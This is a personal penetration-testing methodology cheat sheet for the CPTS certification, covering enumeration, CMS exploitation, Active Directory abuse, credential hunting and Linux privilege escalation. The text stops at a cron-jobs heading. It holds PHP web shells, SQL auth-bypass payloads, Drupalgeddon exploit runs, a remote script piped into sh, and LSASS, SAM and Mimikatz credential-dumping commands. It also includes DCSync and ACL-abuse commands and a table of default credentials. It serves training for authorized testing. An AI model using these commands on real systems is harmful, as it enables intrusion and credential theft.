CPTS · Pentest Methodology

Working Methodology

This methodology was developed and refined throughout preparation for the Certified Penetration Testing Specialist (CPTS) exam by Hack The Box. It represents a structured, practical approach to the full penetration testing lifecycle — from passive reconnaissance through reporting.

Every section maps directly to a phase of a real engagement and reflects techniques tested hands-on through HTB machines, Pro Labs, and the CPTS exam itself. Checklists, commands, and notes are drawn from actual assessments — not just theory.

This is the CPTS-level public release. Future iterations will grow in scope and complexity to encompass post-CPTS certifications — including CAPE and CWEE — as they are earned. The master copy remains private and is updated continuously.

CPTS Offensive Security Active Directory Web Application · Public — v1.0

← Select a topic from the explorer to get started.

Host Enumeration

Initial host and port discovery — find what's alive, what's listening, and what version it's running.

Network Discovery

fping host sweep

fping -asgq <CIDR>

NXC SMB discovery — catches Windows hosts that drop ICMP

nxc smb <CIDR>

Look for neighbors

Linux

arp-scan <CIDR>

Windows — CMD

arp -a

Windows — PowerShell

Get-NetNeighbor

TCP Scanning

Full port scan — save output

nmap -p- --min-rate 1000 -T4 <TARGET> -oA TCP_allports

Extract open ports into variable

ports=$(grep open TCP_allports.nmap | awk -F/ '{print $1}' | tr '\n' ',' | sed 's/,$//')

Targeted scan with version detection and default scripts

nmap -p $ports -sC -sV -vv -oA TCP_detailed <TARGET>

Vuln scan if warranted

nmap -p $ports --script vuln -oA TCP_vuln <TARGET>

UDP Scanning

Top 100 UDP ports

nmap -sU --top-ports 100 --min-rate 500 -T4 -oA UDP_top <TARGET>

Extract open UDP ports

udp_ports=$(grep open UDP_top.nmap | awk -F/ '{print $1}' | tr '\n' ',' | sed 's/,$//')

Targeted UDP scan with version detection

nmap -sU -sC -sV -p $udp_ports -oA UDP_detailed <TARGET>

Fingerprinting

OS detection via NXC — reports OS directly in output

nxc smb <TARGET>

Banner grab on interesting ports

nc <TARGET> <PORT>

SSL/TLS inspection — certs often leak hostnames and internal domain names

openssl s_client -connect <TARGET>:443

Check TTL for quick OS inference — Linux ≈ 64, Windows ≈ 128
Run service-specific scripts once services are identified

NFS

Enumerate NFS shares exposed on a host

showmount -e <TARGET>

Mount a share and browse for credentials or sensitive files

sudo mount -t nfs <TARGET>:<SHARE_PATH> /mnt
ls -la /mnt

Unmount when done

sudo umount /mnt

File Transfer

Transfer files between hosts — HTTP servers, wget, curl, certutil, PowerShell, netcat, and SCP.

Serving Files

Start a Python HTTP server

python3 -m http.server <PORT>

Start an SMB server — useful for Windows targets that can’t reach HTTP

impacket-smbserver share . -smb2support

Download to Linux

wget http://<HOST>:<PORT>/<FILE>

curl -O http://<HOST>:<PORT>/<FILE>

Download to Windows

certutil

certutil -urlcache -split -f http://<HOST>:<PORT>/<FILE> <OUTPUT_FILE>

PowerShell — Invoke-WebRequest

Invoke-WebRequest http://<HOST>:<PORT>/<FILE> -OutFile <OUTPUT_FILE> -UseBasicParsing

PowerShell — WebClient

(New-Object Net.WebClient).DownloadFile('http://<HOST>:<PORT>/<FILE>', '<OUTPUT_FILE>')

SMB

copy \\<HOST>\share\<FILE> <OUTPUT_FILE>

Upload from Linux

scp <FILE> <USER>@<HOST>:<DEST_PATH>

Upload from Windows

PowerShell — TCP socket

$tcp = New-Object System.Net.Sockets.TcpClient('<HOST>', <PORT>)
$stream = $tcp.GetStream()
[byte[]]$bytes = [System.IO.File]::ReadAllBytes('<FILE>')
$stream.Write($bytes, 0, $bytes.Length)
$stream.Close()
$tcp.Close()

Linux — receive

nc -lvnp <PORT> > <OUTPUT_FILE>

SCP from Windows

scp <FILE> <USER>@<HOST>:<DEST_PATH>

Base64

Encode — Linux

base64 -w 0 <FILE>

Decode — Linux

echo '<BASE64_STRING>' | base64 -d > <OUTPUT_FILE>

Encode — Windows

[Convert]::ToBase64String([IO.File]::ReadAllBytes('<FILE>'))

Decode — Windows

[IO.File]::WriteAllBytes('<OUTPUT_FILE>', [Convert]::FromBase64String('<BASE64_STRING>'))

HTTP (80/443)

Initial HTTP enumeration: fingerprinting, directory brute force, vhost discovery, and common checks.

Nmap Web Scripts

sudo nmap -sV -p80,443,8080,8443 --script http-headers,http-title,http-methods <TARGET>

Fingerprinting

Identify technology stack from headers and body

whatweb http://<TARGET>
curl -sI http://<TARGET>

Check common tell-tale paths

/robots.txt
/sitemap.xml
/.well-known/
/README.txt
/CHANGELOG.txt
/INSTALL.txt
/.git/

Directory Brute Force

Feroxbuster (recursive)

feroxbuster -u http://<TARGET> -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt

Gobuster

gobuster dir -u http://<TARGET> -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

FFUF

ffuf -u http://<TARGET>/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt

Virtual Host / Subdomain Brute

Subdomain brute (DNS)

ffuf -u http://<TARGET>/ -H "Host: FUZZ.<DOMAIN>" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs <DEFAULT_SIZE>

Filter by response size to cut noise (-fs = filter size, -fw = filter words)

Extension Brute

Target specific extensions based on what the stack suggests

gobuster dir -u http://<TARGET> -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt -x php,asp,aspx,jsp,txt,bak,old

Nikto

Broad misconfiguration and vulnerability scan

nikto -h http://<TARGET>

Technology Identification Clues

Indicator	Technology
`X-Powered-By: PHP`	PHP backend
`X-Powered-By: ASP.NET`	.NET / IIS
Cookie `PHPSESSID`	PHP
Cookie `JSESSIONID`	Java (Tomcat/Spring)
`/wp-login.php`	WordPress
`/administrator/`	Joomla
`/user/login`	Drupal
`Server: Apache Coyote`	Tomcat

Source Inspection

curl -s http://<TARGET>/ | grep -Ei 'wordpress|joomla|drupal|wp-content|generator'

Comments, form actions, and meta generator tags often leak CMS version and framework.

Common Sensitive Paths

/.env
/.htaccess
/config.php
/wp-config.php
/configuration.php
/LocalSettings.php
/web.config
/backup/
/db/
/admin/
/phpmyadmin/

BloodHound

BloodHound CE — start, reset, and manage the Docker-based BloodHound instance.

Starting BloodHound CE

Run from the BloodHound install directory

docker compose up -d

Find the initial password

docker compose logs bloodhound | grep -i "Initial Password"

Open the UI at http://127.0.0.1:8080 and log in with admin / <found password>

Resetting BloodHound CE

Destroy the current catalog — wipes all ingested data

docker compose down -v

Restart and get a new password

docker compose up -d
docker compose logs bloodhound | grep -i "Initial Password"

Web Enumeration

Web service enumeration — fingerprint the stack, map the surface, fuzz for content, and find virtual hosts.

Fingerprinting

Banner grab

curl -I http://<TARGET>

Technology fingerprint

whatweb http://<TARGET> -v

WAF detection

wafw00f <TARGET>

Nikto scan

nikto -h http://<TARGET> -Tuning b

Manual Checks

Add domain to /etc/hosts if needed

echo "<IP> <DOMAIN>" | sudo tee -a /etc/hosts

View page source for comments, credentials, API endpoints

curl http://<TARGET> | grep -i "password\|username\|api\|key"

Check robots.txt

curl http://<TARGET>/robots.txt

Check sitemap

curl http://<TARGET>/sitemap.xml

Check for exposed .git directory

curl http://<TARGET>/.git/HEAD
curl http://<TARGET>/.git/config

Dump .git if accessible

git-dumper http://<TARGET>/.git /output/directory

Sensitive File Checks

Check common backup files

curl http://<TARGET>/backup.zip
curl http://<TARGET>/backup.tar.gz
curl http://<TARGET>/backup.sql
curl http://<TARGET>/db.sql

Check common config files

curl http://<TARGET>/config.php
curl http://<TARGET>/wp-config.php
curl http://<TARGET>/.env
curl http://<TARGET>/web.config

Directory & File Enumeration

Directory fuzz

ffuf -u http://<TARGET>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -ic -t 200

Fuzz with file extensions

ffuf -u http://<TARGET>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -e .php,.html,.txt,.bak

Recursive fuzz

ffuf -u http://<TARGET>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -recursion -recursion-depth 1 -e .php -v

VHost & Subdomain Enumeration

VHost fuzz

ffuf -u http://<TARGET>/ -H 'Host: FUZZ.<DOMAIN>' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac

Add any discovered vhosts to /etc/hosts and re-enumerate

DNS Enumeration

Zone transfer attempt

dig axfr @<DNS_SERVER> <DOMAIN>

All DNS records

dig any <DOMAIN>

Subdomain brute force

dnsenum --enum <DOMAIN> -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -r

Certificate transparency — extract subdomains

curl -s "https://crt.sh/?q=%25.<DOMAIN>&output=json" | jq -r '.[].name_value' | sort -u

Try default credentials manually — admin:admin, admin:password, admin:123456, root:root, guest:guest

Input Testing

Enter ' in all form fields — an error or changed response means it’s worth pursuing
If a login form reacts, try auth bypass payloads

admin' OR '1'='1
' OR 1=1--
admin'-- -

Run sqlmap against any forms — catches blind injection that won’t show in manual testing

sqlmap -u "http://<TARGET>/login.php" --data="username=admin&password=test" --batch --level=2

Wordlists

Standard SecLists paths by category, and custom wordlist generation with CeWL, Crunch, username-anarchy, and CUPP.

Standard Paths

Default credentials

/usr/share/seclists/Passwords/Default-Credentials/default-passwords.txt

Usernames — short

/usr/share/seclists/Usernames/top-usernames-shortlist.txt

Usernames — large

/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Passwords

/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt

Directories — medium

/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Subdomains

/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

Extensions

/usr/share/seclists/Discovery/Web-Content/web-extensions.txt

Parameters

/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

LFI payloads

/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt

API endpoints

/usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
/usr/share/seclists/Discovery/Web-Content/common-api-endpoints.txt

Custom Wordlists

CeWL — scrape a site and build a wordlist from its content

cewl http://<TARGET> -w wordlist.txt
cewl http://<TARGET> -m 6 -d 2 -w wordlist.txt

Crunch — generate by pattern or charset

crunch 8 8 -t Password@@@ -o wordlist.txt
crunch 6 8 0123456789abcdef -o hex.txt

username-anarchy — generate username variations from a full name

username-anarchy "John Doe" > usernames.txt
username-anarchy -i names.txt > usernames.txt

CUPP — targeted password list from personal info

cupp -i

Policy Filtering

Filter a wordlist to match a known password policy before brute forcing

grep -E '^.{8,}' rockyou.txt \
  | grep -E '[A-Z]' \
  | grep -E '[a-z]' \
  | grep -E '[0-9]' \
  | grep -E '[!@#$%^&*]' > filtered.txt

Remove duplicates and sort

sort -u wordlist.txt -o wordlist.txt

Merge multiple lists

cat list1.txt list2.txt | sort -u > combined.txt

bloodhound.py

bloodhound.py — legacy Python-based BloodHound collector. Prefer rusthound-ce for active use.

Installation

pip install bloodhound

Collection

Collect all data and output JSON files

bloodhound-python -u <USER> -p '<PASS>' -d <DOMAIN> -dc <DC_IP> -c all

Collect and zip for direct import

bloodhound-python -u <USER> -p '<PASS>' -d <DOMAIN> -dc <DC_IP> -c all --zip

Collect with Kerberos auth

bloodhound-python -u <USER> -k -d <DOMAIN> -dc <DC_IP> -c all --no-pass

WordPress

WordPress enumeration, login brute force, RCE via theme editor, and vulnerable plugin exploitation.

Discovery

Key paths to check manually

/robots.txt
/wp-admin
/wp-login.php
/wp-content/plugins/
/wp-content/themes/

Fingerprinting

Confirm WordPress and identify themes/plugins from page source

curl -s http://<TARGET> | grep WordPress
curl -s http://<TARGET>/ | grep themes
curl -s http://<TARGET>/ | grep plugins

WPScan Enumeration

Full enumeration with API token

wpscan --url http://<TARGET> --enumerate --api-token <API_TOKEN>

Enumerate without token — no vulnerability data but still finds users, plugins, themes

wpscan --url http://<TARGET> --enumerate u,p,t

xmlrpc method — faster than wp-login

wpscan --url http://<TARGET> --password-attack xmlrpc -t 20 -U <USER> -P /usr/share/wordlists/rockyou.txt

RCE via Theme Editor

With admin access: Appearance → Theme File Editor → select 404.php → insert web shell → Update File

<?php system($_GET[0]); ?>

Trigger the shell

curl http://<TARGET>/wp-content/themes/<THEME>/404.php?0=id

Vulnerable Plugins

mail-masta — LFI

curl -s http://<TARGET>/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

wpDiscuz — unauthenticated file upload (CVE-2020-24186)

python3 wp_discuz.py -u http://<TARGET> -p /?p=1
curl -s http://<TARGET>/wp-content/uploads/<YEAR>/<MONTH>/<SHELL>.php?cmd=id

Cred Hunting — Linux

Hunt for credentials on a Linux foothold — config files, history, keys, hashes, and memory.

Automated Tools

Run LinPEAS

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Run LaZagne — dumps credentials from browsers, databases, and sysadmin tools

python3 laZagne.py all

SSH Keys

Search for private keys

find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null

Check authorized_keys and .pem files

find /home -name "authorized_keys" -o -name "*.pem" 2>/dev/null

Config Files & Credentials

Search /etc/ for passwords

grep -ri "password" /etc/ 2>/dev/null

Search web directories for passwords

grep -R "password\|passwd\|secret\|token" /var/www /opt /home 2>/dev/null

Find database config files

find / -name "*config*.php" -o -name "database.yml" -o -name ".env" 2>/dev/null

Search for database dump files

find / -name "*.sql" -o -name "*.db" -o -name "*.sqlite" 2>/dev/null | grep -v "doc\|lib\|share"

Common service config locations

cat /var/www/html/wp-config.php
cat /var/www/html/configuration.php
cat /etc/mysql/my.cnf
cat ~/.my.cnf
cat ~/.ssh/config
cat ~/.aws/credentials
cat ~/.docker/config.json
cat ~/.git-credentials

Shell History

Check bash and shell history for credentials

cat ~/.bash_history | grep -i "password\|pass\|mysql\|ssh"
cat ~/.zsh_history

Check database client histories

cat ~/.mysql_history
cat ~/.psql_history

Check environment variables

env | grep -i pass

User Home Directories

List home directories

ls -la /home/

Check Desktop and Documents folders

ls -laR /home/*/Desktop /home/*/Documents 2>/dev/null

Search for plaintext notes and text files

find /home/* -type f \( -name "*.txt" -o -name "*.md" -o -name "*.notes" \) 2>/dev/null

Search scripts in home directories for credential strings

grep -ri "password\|secret\|token" /home --include="*.sh" --include="*.py" --include="*.pl" 2>/dev/null

Hash Hunting

Check /etc/passwd and /etc/shadow

cat /etc/passwd
cat /etc/shadow

Combine for offline cracking (requires root)

unshadow /etc/passwd /etc/shadow > unshadowed.txt

Check old password file

cat /etc/security/opasswd

Memory & Sessions

mimipenguin — dump credentials from memory

python3 mimipenguin.py

Capture plaintext credentials from network traffic (if privileged)

tcpdump -i eth0 -A -s0 'tcp port 21 or tcp port 23' | grep -i "user\|pass"

Google Dorks

Google search operators and dork patterns for exposed files, login panels, sensitive content, and OSINT.

Operators

Operator	Description	Example
`site:`	Limit to a domain	`site:example.com`
`inurl:`	Term in the URL	`inurl:login`
`intitle:`	Term in page title	`intitle:"index of"`
`intext:`	Term in page body	`intext:"password reset"`
`filetype:`	Specific file extension	`filetype:pdf`
`cache:`	Cached version of a page	`cache:example.com`
`related:`	Similar sites	`related:example.com`
`" "`	Exact phrase	`"internal use only"`
`-`	Exclude term	`site:example.com -inurl:login`
`*`	Wildcard	`filetype:pdf user* manual`
`OR`	Either term	`filetype:sql OR filetype:db`
`AND`	Both terms	`site:example.com AND inurl:admin`
`..`	Numeric range	`"price" 100..500`

site:example.com inurl:login
site:example.com (inurl:login OR inurl:admin OR inurl:portal)
site:example.com intitle:"admin" inurl:admin

Exposed Files

site:example.com filetype:env
site:example.com filetype:sql
site:example.com filetype:log
site:example.com (filetype:zip OR filetype:tar OR filetype:gz) inurl:backup
site:example.com (filetype:xls OR filetype:docx OR filetype:pdf)
site:example.com inurl:wp-config.php
site:example.com filetype:txt (password OR credentials OR secret)

Infrastructure Exposure

site:example.com intitle:"Index of /"
site:example.com intitle:"Apache Status"
site:example.com inurl:phpmyadmin
site:example.com inurl:.git
site:example.com inurl:config (ext:conf OR ext:cnf OR ext:ini)

site:*.example.com
related:example.com
link:example.com

Cloud Storage

intext:example.com inurl:amazonaws.com
intext:example.com inurl:blob.core.windows.net
intext:example.com inurl:storage.googleapis.com

OSINT

site:linkedin.com "at example.com"
site:example.com "@example.com" (email OR contact)
site:example.com filetype:pdf inauthor:"<NAME>"

Technology Fingerprinting

site:example.com "powered by WordPress"
site:example.com "powered by Joomla"
site:example.com inurl:jira
site:example.com inurl:confluence

Joomla

Joomla discovery, enumeration with JoomScan, brute force, and template-based RCE.

Discovery

Key paths that confirm Joomla

/administrator/
/README.txt           ← often leaks version
/configuration.php
/htaccess.txt
/web.config.txt

curl -s http://<TARGET>/README.txt | head -5

Fingerprinting

whatweb http://<TARGET>
curl -s http://<TARGET>/ | grep -i joomla

JoomScan

joomscan -u http://<TARGET>

Enumerate components / extensions

joomscan -u http://<TARGET> --enumerate-components

Droopescan

droopescan scan joomla -u http://<TARGET>

Version Discovery

curl -s http://<TARGET>/administrator/manifests/files/joomla.xml | grep version

Default Admin Path

http://<TARGET>/administrator/

Default creds to try: admin/admin, admin/password

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login:Incorrect"

RCE via Template Editor (Admin Required)

Extensions → Templates → Templates → select active template → Edit Files → error.php

Paste a web shell

<?php system($_GET['cmd']); ?>

Trigger the shell

curl http://<TARGET>/templates/<TEMPLATE>/error.php?cmd=id

Vulnerable Extensions

Check installed extensions against known CVEs via JoomScan output, then search ExploitDB

searchsploit joomla <EXTENSION_NAME>

Config File (if system access)

cat /var/www/html/configuration.php

Contains DB credentials — often reusable elsewhere on the box.

BloodyAD

BloodyAD command reference — AD object manipulation, ACE abuse, LDAP operations, and delegation.

Installation

uv tool install bloodyAD

pipx install bloodyAD

Authentication Flags

Flag	Description
`-k`	Use Kerberos authentication
`-P :<HASH>`	Pass an NTLM hash instead of a password
`-f rc4`	Specify hash format

Object Operations

Get a user object’s attributes

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' get object <TARGET_USER>

Find all writable attributes for the current user

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' get writable --detail

Group Operations

Add a member to a group

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add groupMember <GROUP> <MEMBER>

Password Operations

Change a user’s password

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' set password <TARGET_USER> '<NEW_PASS>'

ACL Operations

Grant GenericAll over an object

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add genericAll "<TARGET_DN>" <USER>

Take ownership of an object

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' set owner <TARGET_OBJECT> <USER>

Grant DCSync rights

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add dcsync <USER>

SPN Operations

Set a fake SPN to make a user Kerberoastable

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' set object <TARGET_USER> servicePrincipalName -v 'fake/spn'

Remove an SPN

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' set object <TARGET_USER> servicePrincipalName

Shadow Credentials

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add shadowCredentials <TARGET>

UAC Operations

Enable a disabled account

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' remove uac <TARGET_USER> -f ACCOUNTDISABLE

Add Constrained Delegation flag

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add uac <TARGET_USER> -f TRUSTED_TO_AUTH_FOR_DELEGATION

Computer Operations

Add a computer account (requires MachineAccountQuota > 0)

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add computer <COMPUTER> '<COMPUTER_PASS>'

Add Resource-Based Constrained Delegation

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add rbcd '<DELEGATE_TO$>' '<DELEGATE_FROM$>'

GMSA

Read a GMSA account’s managed password

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' get object <TARGET_USER> --attr msDS-ManagedPassword

Deleted Objects

Search for deleted/tombstoned objects

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' get search -c 1.2.840.113556.1.4.2064 --filter '(isDeleted=TRUE)'

Restore a deleted object

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' set restore <TARGET_USER>

DNS Operations

bloodyAD --host <DC_FQDN> -d <DOMAIN> -u <USER> -p '<PASS>' add dnsRecord <DNS_RECORD> <ATTACKER_IP>

Cred Hunting — Windows

Hunt for credentials on a Windows foothold — files, registry, history, dumps, and memory.

Automated Tools

Run WinPEAS

winPEASx64.exe

Run LaZagne — dumps credentials from browsers, databases, and sysadmin tools

.\laZagne.exe all

Run Seatbelt

Seatbelt.exe -group=all

File System

Check saved credentials

Windows — CMD

cmdkey /list

Windows — PowerShell

Get-ChildItem C:\Users\ -Recurse -Include *.rdp,*.config,*.vnc,*.cred,*.xml -ErrorAction SilentlyContinue

Search files for password strings

Windows — CMD

findstr /SIM /C:"password" C:\*.txt C:\*.xml C:\*.ini C:\*.cfg C:\*.config C:\*.ps1 C:\*.yml

Windows — PowerShell

Get-ChildItem C:\ -Recurse -Include *.txt,*.xml,*.config | Select-String "password" | Select-Object Path, LineNumber

Check common unattend file locations

type C:\Windows\Panther\Unattend.xml
type C:\Windows\System32\Sysprep\Unattend.xml
type C:\inetpub\wwwroot\web.config

User Home Directories

List user profiles

Windows — CMD

dir C:\Users\

Windows — PowerShell

Get-ChildItem C:\Users\

Browse Desktop and Documents for each user

Windows — CMD

dir /a C:\Users\<USERNAME>\Desktop
dir /a C:\Users\<USERNAME>\Documents

Windows — PowerShell

Get-ChildItem C:\Users\ -Recurse -Include *.txt,*.pdf,*.doc,*.docx,*.xls,*.xlsx,*.ps1,*.bat -ErrorAction SilentlyContinue

Search for KeePass database files

Windows — CMD

dir /s /b C:\Users\*.kdbx 2>nul

Windows — PowerShell

Get-ChildItem C:\Users\ -Recurse -Include *.kdbx -ErrorAction SilentlyContinue

Check Chrome dictionary file for saved passwords

Windows — PowerShell

Get-ChildItem "C:\Users\" -Recurse -Filter "Custom Dictionary.txt" -ErrorAction SilentlyContinue | Get-Content | Select-String password

PowerShell History

Read PowerShell command history

Windows — CMD

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Windows — PowerShell

Get-Content (Get-PSReadlineOption).HistorySavePath

Check PowerShell history for all user profiles

Windows — PowerShell

foreach($user in ((ls C:\Users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Registry

Search registry for passwords

Windows — CMD

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Windows — PowerShell

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Check PuTTY saved sessions for stored credentials

Windows — PowerShell

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

SAM & LSA Dumping

Dump SAM, SYSTEM, and SECURITY hives locally (requires admin)

reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive

Extract hashes from hives on attack box

secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

Remote SAM dump via NXC

nxc smb <TARGET> -u <USER> -p <PASS> --sam

Remote LSA dump via NXC

nxc smb <TARGET> -u <USER> -p <PASS> --lsa

LSASS Dumping

Get LSASS PID

tasklist | findstr lsass

Dump LSASS with rundll32

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full

Parse dump on attack box

pypykatz lsa minidump lsass.dmp

Mimikatz

Dump logon passwords

privilege::debug
sekurlsa::logonpasswords

Dump SAM database

lsadump::sam

Dump Credential Manager

sekurlsa::credman

Export Kerberos tickets

sekurlsa::tickets /export

Default Credentials

Default login credentials by service category — web apps, databases, file services, network devices, and IPMI.

Web Applications

Service	Credentials
Apache Tomcat	`tomcat:tomcat` `tomcat:s3cret` `admin:admin`
Jenkins	`admin:admin` — also check unauthenticated access
phpMyAdmin	`root:` (blank) `root:root` `admin:admin`
WordPress	`admin:admin` `admin:password`
Joomla	`admin:admin`
Drupal	`admin:admin`
GitLab	`root:5iveL!fe`
Grafana	`admin:admin`
RabbitMQ	`guest:guest`
Elasticsearch / Kibana	`elastic:changeme`

Database Services

Service	Credentials
MySQL	`root:` (blank) `root:root` `root:mysql`
MSSQL	`sa:` (blank) `sa:sa` `sa:password`
PostgreSQL	`postgres:postgres`
MongoDB	(blank) `admin:admin`
Redis	No auth by default — `redis-cli -h <TARGET>`

File & Remote Access Services

Service	Credentials
FTP	`anonymous:anonymous` `ftp:ftp`
SMB	`Administrator:` (blank) `guest:` (blank)
SSH (IoT)	`root:root` `root:toor` `root:password` `pi:raspberry`
RDP	`Administrator:password` `Administrator:Password123`
WinRM	Try found credentials from other services first

Network Devices

Device	Default IP	Credentials
Cisco	—	`cisco:cisco` `admin:admin`
Linksys	—	`admin:admin` `admin:password`
Ubiquiti	192.168.1.1	`ubnt:ubnt`
TP-Link	192.168.0.1	`admin:admin`
D-Link	192.168.0.1	`admin:` (blank)
ASUS	192.168.1.1	`admin:admin`
MikroTik	192.168.88.1	`admin:` (blank)

Out-of-Band Management (IPMI / iDRAC / iLO)

Device	Credentials
IPMI	`ADMIN:ADMIN` `admin:password`
Dell iDRAC	`root:calvin`
HP iLO	`Administrator:<random>` — crack with hashcat -m 7300
Supermicro	`ADMIN:ADMIN`

IoT / Appliances

Device	Credentials
Raspberry Pi	`pi:raspberry`
HP Printers	`admin:admin` `admin:` (blank)

Drupal

Drupal discovery, version detection, droopescan, Drupalgeddon2 RCE, and PHP filter module abuse.

Discovery

Key paths that confirm Drupal

/CHANGELOG.txt        ← leaks exact version up to Drupal 7
/core/CHANGELOG.txt   ← Drupal 8+
/node/1
/user/login
/README.txt

curl -s http://<TARGET>/CHANGELOG.txt | head -5

Fingerprinting

whatweb http://<TARGET>
curl -s http://<TARGET>/ | grep -i drupal

Check the meta generator tag

curl -s http://<TARGET>/ | grep 'meta name="Generator"'

Droopescan

droopescan scan drupal -u http://<TARGET>

Drupalgeddon2 — CVE-2018-7600 (Drupal 6/7/8)

Unauthenticated RCE via form API — affects Drupal < 7.58, 8.x < 8.3.9, 8.4.x < 8.4.6, 8.5.x < 8.5.1

python3 drupalgeddon2.py http://<TARGET>

Via Metasploit

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS <TARGET>
run

Drupalgeddon3 — CVE-2018-7602 (Drupal 7/8)

Requires authentication. Exploits the same API surface via a DELETE request.

python3 drupalgeddon3.py http://<TARGET> <SESSION_COOKIE> <FORM_TOKEN>

Modules → PHP Filter → Enable

Add content → Basic page → set format to “PHP code” → paste shell

<?php system($_GET['cmd']); ?>

Visit the created node to execute — URL will be /node/<N>?cmd=id

RCE via Theme (Admin Required)

Appearance → install theme from URL → upload malicious zip with PHP file inside

Or edit a .php theme file directly via admin interface if file write is exposed.

Config File (if system access)

Drupal 7

cat /var/www/html/sites/default/settings.php

Drupal 8+

cat /var/www/html/sites/default/settings.php

Contains DB credentials — often reusable.

cURL

cURL command reference — flags, HTTP methods, headers, cookies, file upload, and proxy.

Flags

Flag	Description
`-v`	Verbose output
`-s`	Silent — suppress progress
`-I`	HEAD request only
`-L`	Follow redirects
`-k`	Ignore SSL certificate errors
`-o <file>`	Write output to file
`-A '<UA>'`	Set User-Agent
`-H '<header>'`	Set a request header
`-b '<cookie>'`	Set cookie
`-u user:pass`	Basic authentication
`-X <METHOD>`	HTTP method (POST, PUT, DELETE…)
`-d '<data>'`	POST body data
`-F 'key=@file'`	Multipart file upload
`-x http://host:port`	Use proxy

GET Request

curl -s http://<TARGET>/<PATH>

POST Request

curl -s -X POST http://<TARGET>/<PATH> -d 'username=admin&password=admin'

Set Headers

curl -s -H 'Authorization: Bearer <TOKEN>' -H 'Content-Type: application/json' http://<TARGET>/<PATH>

curl -s -b 'PHPSESSID=<SESSION_ID>' http://<TARGET>/<PATH>

File Upload

curl -s -F 'file=@shell.php' http://<TARGET>/upload.php

Through Burp Proxy

curl -s -x http://127.0.0.1:8080 -k http://<TARGET>/<PATH>

Download a File

curl -s -O http://<TARGET>/<FILE>
curl -s -o <OUTPUT_FILE> http://<TARGET>/<FILE>

PrivEsc — Linux

Escalate from a low-privilege Linux shell — sudo, SUID, cron, capabilities, and kernel exploits.

Automated Tools

Run LinPEAS

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Run Linux Exploit Suggester

./les.sh

User & System Context

Check current user and group memberships — note docker, lxd, adm, disk groups

id

Check kernel version

uname -a

Check OS release

cat /etc/os-release

List running processes

ps aux

Check internally listening services — may expose services only reachable locally

ss -tlnp

Sudo Abuse

List allowed sudo commands

sudo -l

Look up any allowed binaries on GTFOBins — https://gtfobins.github.io/
Check if LD_PRELOAD is preserved in sudo env

sudo -l | grep -i LD_PRELOAD

SUID / SGID Binaries

Find SUID binaries

find / -perm -4000 -type f 2>/dev/null

Find SGID binaries

find / -perm -2000 -type f 2>/dev/null

Cross-reference results with GTFOBins

Capabilities

List binaries with elevated capabilities

getcap -r / 2>/dev/null

Cron Jobs

